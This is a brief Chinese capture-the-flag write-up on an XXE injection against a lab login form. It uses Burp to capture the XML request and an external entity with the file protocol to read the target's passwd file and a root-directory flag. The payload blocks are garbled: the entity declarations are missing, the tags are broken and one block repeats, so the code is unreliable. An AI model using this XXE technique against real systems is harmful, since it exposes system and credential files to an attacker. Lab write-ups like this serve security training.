利用XXE漏洞进行文件读取
的字段,更加确定会是XXE注入了
burp准备抓包,随便写入账号密码,点击login查看抓取的请求包
post数据,可以确定是XXE漏洞了,直接测试XXE漏洞的payload,利用file协议读取靶机的passwd文件内容。执行XXE注入代码关键的点就在于&admin;,需要把它写入都标签内才能成功执行上面的外部实体的代码
DOCTYPE note [ ]>
<user><username>&admin;username><password>aaaapassword>user>


paylaod能成功读取文件,XXE漏洞的flag一般也都放在根目录下,也不会更改复杂的名字,所以尝试读取根目录flag,成功拿下
DOCTYPE note [ ]>
<user><username>&admin;username><password>aaaapassword>user>
DOCTYPE note [ ]>
<user><username>&admin;username><password>aaaapassword>user>